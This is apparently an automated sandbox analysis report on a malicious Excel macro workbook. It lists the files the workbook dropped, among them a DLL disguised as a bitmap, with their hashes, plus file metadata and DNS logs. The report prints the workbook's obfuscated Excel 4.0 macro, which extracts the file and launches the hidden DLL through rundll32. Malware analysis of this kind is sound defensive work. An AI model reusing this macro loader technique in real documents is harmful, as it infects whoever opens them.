                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorizeD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://staging.cortana.aiD0ABBA7E-82AC-4F27-9513-F2F232EAEE61.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    No contacted IP infos

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:412575
                                                                                                                                                    Start date:12.05.2021
                                                                                                                                                    Start time:19:47:23
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 57s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:4468873941_759979693.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:27
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal72.troj.expl.evad.winXLSM@1/10@0/0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    No context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmpf9309eba_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                      f9309eba_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D0ABBA7E-82AC-4F27-9513-F2F232EAEE61
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):134558
                                                                                                                                                        Entropy (8bit):5.368393984842858
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:ecQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:9EQ9DQW+zPXO8
                                                                                                                                                        MD5:26C62B1E357DAFB117A5C08A2D6EFD2E
                                                                                                                                                        SHA1:268D333AA692DAA9A463FD00D120351805807992
                                                                                                                                                        SHA-256:29F7497AD2736955E29094A3D11DC9B76D49E5F0F7FE0AAD16AE7CFECBF2B2FB
                                                                                                                                                        SHA-512:F2F2A3802E203A7F25B62DCB54A687FDA0DD6FAA66CFE46CC49BD7E59D1FE01B98B0E96FD744852258D70891F54FABEC08A2EF40DDFE1069F547DFC768CD32AF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T17:48:20">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\94EEA4B9.jpeg
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:[TIFF image data, big-endian, direntries=9, software=Adobe Photoshop 22.0 (Windows), datetime=2021:03:02 23:57:02], baseline, precision 8, 1600x1600, frames 3
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):185386
                                                                                                                                                        Entropy (8bit):7.326521161282199
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:0LQj2wtPO88Ew5AIsPixqYtVYeFH4ZwHrcRd7Ay2rf4KGn5hk57do:0Lex0VAIu4bVYeVHrK5AySfahk8
                                                                                                                                                        MD5:A6E3680B30CEC6746291E55B7D9B6975
                                                                                                                                                        SHA1:E45C3A057F840EF4C96AB8233E1E21700BBDA199
                                                                                                                                                        SHA-256:89934494B26BCA1A6B28C2D262392548FA12CEBDF648E5F2DCD793CBF71FB261
                                                                                                                                                        SHA-512:FD0DE48198B51F437ADFFC5A0F12880334047D177E67D92199EFEF09F697FC0771D738B28E47EAB17FD52A772AE74CEAFABFD0F7253C526B86D5ADD4912F712B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ......JFIF.....`.`.....NExif..MM.*.......1...........2..................................Q...........Q...........Q...........i.....................z....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBD11366.bmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):647168
                                                                                                                                                        Entropy (8bit):6.903949816811106
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:uRgaHm2fjIxEh+bLlmTlEPMx4rBjVXmePxfH3KYypHKlA:2gim2fMOh+mF4NUmKYy0lA
                                                                                                                                                        MD5:C77E025AB5500D3A00B86265C73CC0B3
                                                                                                                                                        SHA1:83B5715406E67F33E0030C2F17991A4D4BE2CBE5
                                                                                                                                                        SHA-256:D1FD867DD79BB803974E18598BDC97CBB8F51ACFFEB8739CE2F01DFF29985803
                                                                                                                                                        SHA-512:BCB03E9EA06A3957D3D9C032BC10B93443ED76E102FDB147B0414BA0D60F57FFD429D5B42B8878A70D1AC5A79AF9E6F8B635574E7731D3AB9BB8248CF43A8DC3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: f9309eba_by_Libranalysis.xlsx, Detection: malicious, Browse
                                                                                                                                                        • Filename: f9309eba_by_Libranalysis.xlsx, Detection: malicious, Browse
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........P.......................................................................................>..E...\!..........|........................4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Z...@...0...@..............@....rsrc...|............p..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\01A10000
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):607115
                                                                                                                                                        Entropy (8bit):7.891618337675893
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:+Qex0VbLbGeH+59SjSGst3hglv595+6tLAJVX0cfxBNtsY69bWed00:+VKVbLte52Et3i/+mAJ2gsY6oeR
                                                                                                                                                        MD5:A60F2EE468B7DDAEE2213B29EFEFA9E2
                                                                                                                                                        SHA1:2C79577B3D4FE36CC2728084D1C600C195859328
                                                                                                                                                        SHA-256:AF362BDA4E5CFC6071599D6687190850EF73BFA8325944F639ED8FC58B597937
                                                                                                                                                        SHA-512:97E7A72EC5CDBB7D8C2706381B9F88BCD821A17CA20390A766710B68E318B7BC68404290C81D067263BFC87D21FC30624B21247ED370D9BB5E16B900128C4A97
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .UMO.1..W..X.Z.:p@..C.G@.~.cOv..K......).%a..^.k..{...O/V.TO.Q{..f.*p.+.=._.?Y.I8%.w.5 ..}.6._.....[...9G......"...H..;..\....dr.w.\.S..f....&U.+..Q2..U.6.e..i...;.Fh..!B0Z.D..'....b.%(/.-.i0D..{.dM..&...R"+...?..A.%0.3..qB..5.,.`... .?P.#o.{...wCM.ZAu+b.....+.}\._6..d;-..`..Yc.........^..a*H..v....k..s%%.H...IG.o.!...C.(7...^..;^.. .6._l.&.!.^DPw..r...^.>.CE.%....o...=~e.....m..i.G....Y..u.D......%;F.rG/3.G..5...7........PK..........!.2..'....3.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4468873941_759979693.xlsm.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Thu May 13 01:49:16 2021, atime=Thu May 13 01:49:16 2021, length=607106, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2220
                                                                                                                                                        Entropy (8bit):4.705601422203448
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:8cowBhInTTyAPmNtDcHh7aB6mycowBhInTTyAPmNtDcHh7aB6m:8zfRPmiMB6pzfRPmiMB6
                                                                                                                                                        MD5:BDD31433B468D88FFFD7478F0F8C89FB
                                                                                                                                                        SHA1:BB7EE104642E00341AEE406CED28B6ACF910C6C3
                                                                                                                                                        SHA-256:205A31B5D5ECDF05082756477E0F6F2CE7EE591E8A858871BE2EDA9319DD1189
                                                                                                                                                        SHA-512:0989C57CA27258A013A884FBFF7367999154DC2A73E1D6FA56BB8657941D69EC3D70A47B19C3275586581C53131E502E307D3C0565929622ACB4DC9C11AABA83
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: L..................F.... .......:....ru..G...ru..G...C...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S........................h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R.......Y..............>......y~.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.PE...R$. .446887~1.XLS..d......>Qwx.R$.....h.....................g./.4.4.6.8.8.7.3.9.4.1._.7.5.9.9.7.9.6.9.3...x.l.s.m......._...............-.......^...........>.S......C:\Users\user\Desktop\4468873941_759979693.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.8.8.7.3.9.4.1._.7.5.9.9.7.9.6.9.3...x.l.s.m.........:..,.LB.)...As...`.......X.......103386...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu May 13 01:49:16 2021, atime=Thu May 13 01:49:16 2021, length=12288, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):904
                                                                                                                                                        Entropy (8bit):4.66506761477544
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8VcXU1cNuElPCH2Jgh7YLW+WrjAZ/2bDczLC5Lu4t2Y+xIBjKZm:8VbhcwAZiDca87aB6m
                                                                                                                                                        MD5:6B505567E9E657D919A80925EB115172
                                                                                                                                                        SHA1:2DCF7CDC35451246AF776A6466CBC7CEBFE7444F
                                                                                                                                                        SHA-256:656736D7F7583E273E55BDFCDE76996CB2C81463ADD631C584AE42D7E3D76A30
                                                                                                                                                        SHA-512:47ECCCCC9A3667245A8B7963957BB278CB8CDCCD6F39A0F207BC77619A43A6B0758CC334A6F988268CE73845DDAF0735727AA3446734881B0E5BF59A63F4A610
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: L..................F........N....-...$g..G...`b..G...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S........................h.a.r.d.z.....~.1......R)...Desktop.h.......Ny..R)......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......103386...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):130
                                                                                                                                                        Entropy (8bit):4.624243032830697
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:oyBVomxWa7DOccLnPpS7fDOccLnPpSmxWa7DOccLnPpSv:djz8Ppk8PpB8Ppc
                                                                                                                                                        MD5:6213FA48CA121097DE18DFD4113FE255
                                                                                                                                                        SHA1:12F501A1D7E199A3C991295810489D7326FA416E
                                                                                                                                                        SHA-256:FAB6A069F300691240B7268FBA2C7B94850DCCD340FDA35C26FDD0EA304A6278
                                                                                                                                                        SHA-512:7B11FDAB354AA12CBBB9A8B2FFAFBC63378F0FE1A72B44AA7EF0E1A36D2034A864C576E9C2F28B303BAAEC8486EA4E538C8E684AD8E0E50D0F94954FE40FE122
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: Desktop.LNK=0..[misc]..4468873941_759979693.xlsm.LNK=0..4468873941_759979693.xlsm.LNK=0..[misc]..4468873941_759979693.xlsm.LNK=0..
                                                                                                                                                        C:\Users\user\Desktop\72A10000
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):607106
                                                                                                                                                        Entropy (8bit):7.891598350257384
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:TQex0VbLbGeH+59SjSGst3hglv595+6tLAJVX0cfxBNtsY69bWed0O:TVKVbLte52Et3i/+mAJ2gsY6oeL
                                                                                                                                                        MD5:F0FCD671779202D3F409C980DEADA21A
                                                                                                                                                        SHA1:5E785807A7A4C7E17225916478304BEB87F28AEB
                                                                                                                                                        SHA-256:48073B161A96D81F560B4DCC800C04F78EAD5ABCD52F1178F70C2DCDCCEDEFCC
                                                                                                                                                        SHA-512:18594420590987B2527E74B96D8BF9165297F9A45FBC6F53320E9C04E5F1F65E90B018B2E1850DC7CAD4876064110EDE282153339988CB54E820A49E01BCD722
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .UMO.1..W..X.Z.:p@..C.G@.~.cOv..K......).%a..^.k..{...O/V.TO.Q{..f.*p.+.=._.?Y.I8%.w.5 ..}.6._.....[...9G......"...H..;..\....dr.w.\.S..f....&U.+..Q2..U.6.e..i...;.Fh..!B0Z.D..'....b.%(/.-.i0D..{.dM..&...R"+...?..A.%0.3..qB..5.,.`... .?P.#o.{...wCM.ZAu+b.....+.}\._6..d;-..`..Yc.........^..a*H..v....k..s%%.H...IG.o.!...C.(7...^..;^.. .6._l.&.!.^DPw..r...^.>.CE.%....o...=~e.....m..i.G....Y..u.D......%;F.rG/3.G..5...7........PK..........!.2..'....3.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\Desktop\~$4468873941_759979693.xlsm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):330
                                                                                                                                                        Entropy (8bit):1.6081032063576088
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                        MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                        SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                        SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                        SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        C:\Users\user\Nioka.meposv
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):607106
                                                                                                                                                        Entropy (8bit):7.891598350257384
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:TQex0VbLbGeH+59SjSGst3hglv595+6tLAJVX0cfxBNtsY69bWed0O:TVKVbLte52Et3i/+mAJ2gsY6oeL
                                                                                                                                                        MD5:F0FCD671779202D3F409C980DEADA21A
                                                                                                                                                        SHA1:5E785807A7A4C7E17225916478304BEB87F28AEB
                                                                                                                                                        SHA-256:48073B161A96D81F560B4DCC800C04F78EAD5ABCD52F1178F70C2DCDCCEDEFCC
                                                                                                                                                        SHA-512:18594420590987B2527E74B96D8BF9165297F9A45FBC6F53320E9C04E5F1F65E90B018B2E1850DC7CAD4876064110EDE282153339988CB54E820A49E01BCD722
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .UMO.1..W..X.Z.:p@..C.G@.~.cOv..K......).%a..^.k..{...O/V.TO.Q{..f.*p.+.=._.?Y.I8%.w.5 ..}.6._.....[...9G......"...H..;..\....dr.w.\.S..f....&U.+..Q2..U.6.e..i...;.Fh..!B0Z.D..'....b.%(/.-.i0D..{.dM..&...R"+...?..A.%0.3..qB..5.,.`... .?P.#o.{...wCM.ZAu+b.....+.}\._6..d;-..`..Yc.........^..a*H..v....k..s%%.H...IG.o.!...C.(7...^..;^.. .6._l.&.!.^DPw..r...^.>.CE.%....o...=~e.....m..i.G....Y..u.D......%;F.rG/3.G..5...7........PK..........!.2..'....3.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Microsoft Excel 2007+
                                                                                                                                                        Entropy (8bit):7.891710388965609
                                                                                                                                                        TrID:
                                                                                                                                                        • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                        • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                        File name:4468873941_759979693.xlsm
                                                                                                                                                        File size:607568
                                                                                                                                                        MD5:b5021bc6cc8e2fc2231978d6c9118f2a
                                                                                                                                                        SHA1:c11430e1206f25bf768f1643f51bed8a4a1eec9d
                                                                                                                                                        SHA256:5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2
                                                                                                                                                        SHA512:e4bd8a7522c45ecf9ed9d19cd0ba4fcc66669f3ec1d1f5539ca35418844926c1f3a8285de1f4d00e7c881be313e0916b462aa3809c44c5e910b1edef9d0eadfb
                                                                                                                                                        SSDEEP:12288:ppex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:pUKVbLte52dt3i/+mAJ2gsY6oe2
                                                                                                                                                        File Content Preview:PK..........!.........3.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74ecd0e2f696908c

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "4468873941_759979693.xlsm"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:
                                                                                                                                                        Application Name:
                                                                                                                                                        Encrypted Document:
                                                                                                                                                        Contains Word Document Stream:
                                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:

                                                                                                                                                        Macro 4.0 Code

                                                                                                                                                        ,,,"=SAVE.COPY.AS(""..\Nioka.meposv"")",run,,,,,,,dll32 ..\xl\media\im,,,,,,"=EXEC(""tar -xf ..\Nioka.meposv -C ..\"")=PI()=PI()=PI()","age2.bmp,StartW",,,,,,,,,,,,,,,,,,,,"=WAIT(NOW()+""00:00:06"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        May 12, 2021 19:48:06.226021051 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:07.349246979 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:07.400501013 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:10.945998907 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:11.008124113 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:11.194689989 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:11.246553898 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:13.545505047 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:13.597048998 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:19.142986059 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:19.191900015 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:20.413820028 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:20.464236021 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:20.498399019 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:20.585886955 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:20.997764111 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:21.067970037 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:21.998219013 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:22.069171906 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:23.021035910 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:23.079288006 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:25.070091963 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:25.079878092 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:25.129519939 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:25.131412983 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:25.949976921 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:26.000600100 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:26.833996058 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:26.886609077 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:28.127679110 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:28.177073002 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:29.114984989 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:29.172358036 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:29.480006933 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:29.528841019 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:33.237559080 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:33.287374020 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:34.003808022 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:34.053873062 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:34.833578110 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:34.882306099 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:36.705913067 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:36.754610062 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:40.912616968 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:40.988368034 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:41.859766006 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:41.909523010 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:43.477632999 CEST5872253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:43.483671904 CEST5659653192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:43.493932009 CEST6410153192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:43.526351929 CEST53587228.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:43.535229921 CEST53565968.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:43.544645071 CEST53641018.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:44.273732901 CEST5054053192.168.2.38.8.8.8
